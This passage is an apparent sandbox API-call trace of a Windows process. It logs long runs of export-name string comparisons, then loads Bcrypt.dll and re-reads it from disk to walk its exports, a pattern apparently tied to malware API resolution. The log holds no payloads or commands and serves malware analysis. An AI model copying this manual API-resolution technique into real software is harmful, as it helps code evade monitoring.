(lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0223.839] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0223.839] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0223.839] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0223.839] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.839] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.840] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0223.841] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.842] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.843] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0223.843] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0223.843] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0223.843] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0223.843] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0223.843] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0223.843] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0223.843] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0223.843] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.843] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0223.843] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0223.844] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0223.872] GetProcessHeap () returned 0x570000 [0223.872] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4109040 | out: hHeap=0x570000) returned 1 [0223.948] GetProcessHeap () returned 0x570000 [0223.948] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589080 [0223.948] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0225.356] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0225.356] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0225.357] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0225.357] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0225.357] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0225.358] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0225.358] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0225.358] GetProcessHeap () returned 0x570000 [0225.358] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x26fa0) returned 0x2d42010 [0225.360] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0225.360] ReadFile (in: hFile=0x15c, lpBuffer=0x2d42010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0225.365] CloseHandle (hObject=0x15c) returned 1 [0225.365] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0225.365] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0225.365] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0225.365] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0225.366] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.366] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0225.366] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0225.366] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0225.366] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0225.366] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0225.366] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0225.366] 